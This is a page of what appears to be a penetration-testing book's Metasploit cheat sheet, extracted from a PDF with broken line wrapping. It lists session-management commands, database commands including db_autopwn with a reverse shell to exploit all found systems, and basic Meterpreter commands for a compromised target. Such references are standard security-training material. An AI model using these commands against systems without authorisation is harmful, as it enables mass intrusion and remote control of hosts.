background image

Cheat Sheet

277

sessions -l -v

List all available sessions and show verbose fields, such as which vulnera-
bility was used when exploiting the system.

sessions -s 

script

Run a specific Meterpreter script on all Meterpreter live sessions.

sessions -K

Kill all live sessions.

sessions -c 

cmd

Execute a command on all live Meterpreter sessions.

sessions -u 

sessionID

Upgrade a normal Win32 shell to a Meterpreter console.

db_create 

name

Create a database to use with database-driven attacks (example: 

db_create

 

autopwn

).

db_connect 

name

Create and connect to a database for driven attacks (example: 

db_connect

 

autopwn

).

db_nmap

Use 

nmap

 and place results in database. (Normal 

nmap

 syntax is supported, 

such as 

–sT –v –P0

.)

db_autopwn -h

Display help for using 

db_autopwn

.

db_autopwn -p -r -e

Run 

db_autopwn

 against all ports found, use a reverse shell, and exploit all 

systems.

db_destroy

Delete the current database.

db_destroy 

user:password@host:port/database

Delete database using advanced options.

Meterpreter Commands

help

Open Meterpreter usage help.

run 

scriptname

Run Meterpreter-based scripts; for a full list check the 

scripts/meterpreter

 

directory.

sysinfo

Show the system information on the compromised target.

ls

List the files and folders on the target.